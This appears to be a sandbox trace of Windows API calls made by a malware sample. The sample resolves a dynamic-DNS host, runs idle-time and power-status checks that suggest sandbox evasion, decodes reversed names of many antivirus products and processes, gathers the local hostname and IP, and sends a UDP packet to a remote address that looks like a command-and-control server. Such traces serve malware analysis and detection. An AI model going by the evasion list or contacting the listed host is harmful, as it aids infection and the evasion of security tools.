[0410.311] gethostbyname (name="asper1.freeddns.org") returned 0x1e06f60*(h_name="asper1.freeddns.org", h_aliases=0x1e06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1e06f88*=([0]="186.48.86.162"))
[0415.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="186", cbMultiByte=3, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="186") returned 3
[0415.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="486", cbMultiByte=2, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="486") returned 2
[0415.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="866", cbMultiByte=2, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="866") returned 2
[0415.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="162", cbMultiByte=3, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="162") returned 3
[0415.299] WSACleanup () returned 0
[0415.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0415.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1f8c280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0415.543] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x24ce380, cchWideChar=2047 | out: lpWideCharStr="1136.dat\x02") returned 8
[0415.543] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x24cf410 | out: lpFindFileData=0x24cf410*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1df5590, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0xfaca0000, ftLastWriteTime.dwLowDateTime=0x7fe, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x24cf4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0415.544] LoadLibraryW (lpLibFileName="user32.dll") returned 0x77780000
[0415.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0415.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x1f8c2b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastInputInfo", lpUsedDefaultChar=0x0) returned 16
[0415.544] GetProcAddress (hModule=0x77780000, lpProcName="GetLastInputInfo") returned 0x777962f4
[0415.545] GetLastInputInfo (in: plii=0x24cf03c | out: plii=0x24cf03c*(cbSize=0x8, dwTime=0x142a26c)) returned 1
[0415.545] GetTickCount () returned 0x14617d7
[0415.545] FreeLibrary (hLibModule=0x77780000) returned 1
[0415.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="0\x80w", cbMultiByte=1, lpWideCharStr=0x24cddc0, cchWideChar=2047 | out: lpWideCharStr="0ʂ") returned 1
[0415.548] GetSystemPowerStatus (in: lpSystemPowerStatus=0x24cf044 | out: lpSystemPowerStatus=0x24cf044) returned 1
[0415.548] QueryPerformanceCounter (in: lpPerformanceCount=0x24cf048 | out: lpPerformanceCount=0x24cf048*=2149999519783) returned 1
[0415.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="00", cbMultiByte=2, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="00") returned 2
[0415.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="XX", cbMultiByte=2, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="XX") returned 2
[0415.548] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24ce816 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0415.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44
[0415.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x1f7db70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpUsedDefaultChar=0x0) returned 44
[0415.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cbMultiByte=44, lpWideCharStr=0x24cd730, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078") returned 44
[0415.554] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), lpFindFileData=0x24ce7c0 | out: lpFindFileData=0x24ce7c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62dcea0, ftCreationTime.dwHighDateTime=0x1dab599, ftLastAccessTime.dwLowDateTime=0x62dcea0, ftLastAccessTime.dwHighDateTime=0x1dab599, ftLastWriteTime.dwLowDateTime=0xa8c94e0, ftLastWriteTime.dwHighDateTime=0x1dab599, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x24ce808, cFileName="~dr9078", cAlternateFileName="")) returned 0x245f30
[0415.555] FindClose (in: hFindFile=0x245f30 | out: hFindFile=0x245f30) returned 1
[0415.555] Sleep (dwMilliseconds=0x3e8)
[0415.567] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24ce816 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0415.567] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff
[0415.567] GetLastError () returned 0x20
[0415.567] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x245a70
[0415.568] SleepEx (dwMilliseconds=0x64, bAlertable=1) returned 0x0
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yksrepsak", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="yksrepsak%\x7f") returned 9
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nrkek", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nrkek%\x7f") returned 8
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="retsohsfk", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="retsohsfk%\x7f") returned 8
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namyshsfk", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="namyshsfk%\x7f") returned 5
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="notronsfk", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="notronsfk%\x7f") returned 6
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tsavansfk", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tsavansfk%\x7f") returned 5
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="arivansfk", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="arivansfk%\x7f") returned 5
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draugva", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.draugva") returned 11
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=" rivitnagva", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr=" rivitnagva") returned 8
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsgvaa", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsgvaa") returned 10
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="iugvavsgvaa", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="iugvavsgvaa") returned 5
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eefacmsgvaa", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="eefacmsgvaa") returned 6
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartpva", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartpva") returned 10
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="dnertartpva", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="dnertartpva") returned 5
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="setaicossa krowten", cbMultiByte=18, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="setaicossa krowten") returned 18
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.pvassa krowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.pvassa krowten") returned 7
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="adnapvassa krowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="adnapvassa krowten") returned 5
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.xsrgva krowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.xsrgva krowten") returned 10
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsdwgvava krowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="cvsdwgvava krowten") returned 8
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugeva krowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.iugeva krowten") returned 8
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartmabsrowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartmabsrowten") returned 12
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssniwabsrowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.ssniwabsrowten") returned 9
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssdbwabsrowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.ssdbwabsrowten") returned 8
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.tnegadbsrowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.tnegadbsrowten") returned 11
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.walccdbsrowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.walccdbsrowten") returned 9
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomladbsrowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nomladbsrowten") returned 9
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sohposmladbsrowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="sohposmladbsrowten") returned 6
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.23mssfbsrowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.23mssfbsrowten") returned 10
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomtnccprowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nomtnccprowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="atad gmtnccprowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="atad gmtnccprowten") returned 6
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iuredipsrowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.iuredipsrowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nom_popsrowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nom_popsrowten") returned 10
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="bewrdom_popsrowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="bewrdom_popsrowten") returned 5
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eruces-fpopsrowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="eruces-fpopsrowten") returned 8
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="hkciuq-fpopsrowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="hkciuq-fpopsrowten") returned 6
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sloot cppopsrowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="sloot cppopsrowten") returned 8
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartstcprowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartstcprowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erpivartstcprowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="erpivartstcprowten") returned 5
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namronrtstcprowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="namronrtstcprowten") returned 6
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.adnaztcprowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.adnaztcprowten") returned 9
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="suriv-itna acowten", cbMultiByte=13, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="suriv-itna acowten") returned 13
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.vsbewhsacowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.vsbewhsacowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartsrsacowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartsrsacowten") returned 10
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draug2aacowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.draug2aacowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="secessmug2aacowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="secessmug2aacowten") returned 7
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="draugllub2aacowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="draugllub2aacowten") returned 9
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tneganlkb2aacowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tneganlkb2aacowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vakbanlkb2aacowten", cbMultiByte=4, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="vakbanlkb2aacowten") returned 4
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tshcvsccb2aacowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tshcvsccb2aacowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="odomocccb2aacowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="odomocccb2aacowten") returned 6
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegadmcb2aacowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnegadmcb2aacowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yart063acowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yart063acowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tngaesiu063acowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tngaesiu063acowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="malcesiu063acowten", cbMultiByte=4, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="malcesiu063acowten") returned 4
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegaredipsacowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnegaredipsacowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="ecivresmabmacowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="ecivresmabmacowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvspavancowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.cvspavancowten") returned 12
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.mocvavancowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.mocvavancowten") returned 9
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartazancowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartazancowten") returned 10
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tenummitazancowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tenummitazancowten") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugvazancowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.iugvazancowten") returned 9
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartmabmazancowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="yartmabmazancowten") returned 8
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsmbmtmazancowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="vrsmbmtmazancowten") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tirivmtmazancowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tirivmtmazancowten") returned 5
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.esnefedevitcahq", cbMultiByte=19, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.esnefedevitcahq") returned 19
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsdpudsvitcahq", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsdpudsvitcahq") returned 12
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegacmdpudsvitcahq", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnegacmdpudsvitcahq") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsdpuyapudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="vrsdpuyapudsvitcahq") returned 8
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnciucmapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnciucmapudsvitcahq") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartexkapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="yartexkapudsvitcahq") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erocsexkpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="erocsexkpudsvitcahq") returned 8
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsvaefmpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="cvsvaefmpudsvitcahq") returned 8
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="nacstr7kpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="nacstr7kpudsvitcahq") returned 8
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.gnepmsmsvitcahq", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.gnepmsmsvitcahq") returned 11
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tfosavalmsmsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tfosavalmsmsvitcahq") returned 8
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.dleihscmvitcahq", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.dleihscmvitcahq") returned 12
[0415.633] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24ce816 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0415.633] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078")) returned 0
[0415.633] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x24ceeb8 | out: lpWSAData=0x24ceeb8) returned 0
[0415.732] gethostname (in: name=0x24cedac, namelen=256 | out: name="Q9iATrkPrH") returned 0
[0415.762] gethostbyname (name="Q9iATrkPrH") returned 0x1e06f60*(h_name="Q9iATrkPrH", h_aliases=0x1e06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1e06f88*=([0]="192.168.0.174"))
[0415.851] inet_ntoa (in=0xae00a8c0) returned="192.168.0.174"
[0415.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="192.168.0.174", cbMultiByte=13, lpWideCharStr=0x24cdce0, cchWideChar=2047 | out: lpWideCharStr="192.168.0.174%") returned 13
[0415.851] WSACleanup () returned 0
[0416.053] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x24cf518 | out: lpWSAData=0x24cf518) returned 0
[0416.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0416.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1f8c2b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0416.065] socket (af=2, type=2, protocol=17) returned 0x268
[0416.078] htons (hostshort=0xe061) returned 0x61e0
[0416.078] inet_addr (cp="186.48.86.162") returned 0xa25630ba
[0416.079] setsockopt (s=0x268, level=65535, optname=4102, optval="ÀÔ\x01", optlen=8) returned 0
[0416.079] sendto (s=0x268, buf=0x24cec3f*, len=96, flags=0, to=0x24cec2c*(sa_family=2, sin_port=0xe061, sin_addr="186.48.86.162"), tolen=16) returned 96
[0416.146] recvfrom (s=0x268, buf=0x24ceb53, len=201, flags=0, from=0x24cec2c, fromlen=0x24cec28)
Thread:
id = 114
os_tid = 0xdcc
Thread:
id = 115
os_tid = 0xd6c
Process:
id = "18"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x22c6c000"
